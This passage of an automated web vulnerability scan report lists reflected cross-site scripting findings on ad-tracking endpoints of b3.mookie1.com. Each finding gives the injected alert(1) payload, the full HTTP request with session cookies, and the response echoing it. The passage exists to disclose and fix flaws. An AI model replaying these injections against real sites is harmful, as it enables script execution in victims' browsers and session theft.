var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York964b4'-alert(1)-'662d9db0b0c&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/
...[SNIP]...

1.240. http://b3.mookie1.com/2/TRACK_Xaxis/1662888868@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1662888868@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47ea'-alert(1)-'8ef7f5c12c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1662888868@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting&b47ea'-alert(1)-'8ef7f5c12c2=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/de/careers/view/account-manager
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206412

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2143
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
axis.com/de/careers/view/account-manager&_RM_HTML_title_=Account%20Manager%2C%20New%20York&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/careers/view/account-manager&Section=Careers&Page=PositionPosting&b47ea'-alert(1)-'8ef7f5c12c2=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.241. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddfc'-alert(1)-'a1bc8a67785 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutionsfddfc'-alert(1)-'a1bc8a67785&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
al preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/solutionsfddfc'-alert(1)-'a1bc8a67785&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?mig
...[SNIP]...

1.242. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e56"><script>alert(1)</script>79c84302a70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis38e56"><script>alert(1)</script>79c84302a70/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis38e56"><script>alert(1)</script>79c84302a70/1182385906/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.243. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30646"><script>alert(1)</script>cda18567433 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1793722233@x5430646"><script>alert(1)</script>cda18567433?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/372304497/x5430646"><script>alert(1)</script>cda18567433/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.244. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c168b'-alert(1)-'d50fbf2c091 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutionsc168b'-alert(1)-'d50fbf2c091 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutionsc168b'-alert(1)-'d50fbf2c091';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.245. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44158'-alert(1)-'b2954bba536 was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/44158'-alert(1)-'b2954bba536&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
mageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/44158'-alert(1)-'b2954bba536&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsectio
...[SNIP]...

1.246. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6530'-alert(1)-'936ce4afac was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisc6530'-alert(1)-'936ce4afac&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2085
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisc6530'-alert(1)-'936ce4afac&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_
...[SNIP]...

1.247. http://b3.mookie1.com/2/TRACK_Xaxis/1793722233@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1793722233@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35773'-alert(1)-'1f9efc4c6ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1793722233@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions&35773'-alert(1)-'1f9efc4c6ca=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206190

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:24:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2035
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
);
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/&Section=Solutions&35773'-alert(1)-'1f9efc4c6ca=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.248. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bdc2'-alert(1)-'c444b2eb090 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact1bdc2'-alert(1)-'c444b2eb090&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2002
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact1bdc2'-alert(1)-'c444b2eb090&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
...[SNIP]...

1.249. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d5e"><script>alert(1)</script>f94ee1c46b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis16d5e"><script>alert(1)</script>f94ee1c46b7/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis16d5e"><script>alert(1)</script>f94ee1c46b7/2105150494/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.250. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69191"><script>alert(1)</script>5c7209f9072 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1847468018@x5469191"><script>alert(1)</script>5c7209f9072?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/448874043/x5469191"><script>alert(1)</script>5c7209f9072/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.251. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6e0'-alert(1)-'995d46c06ef was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contactff6e0'-alert(1)-'995d46c06ef HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
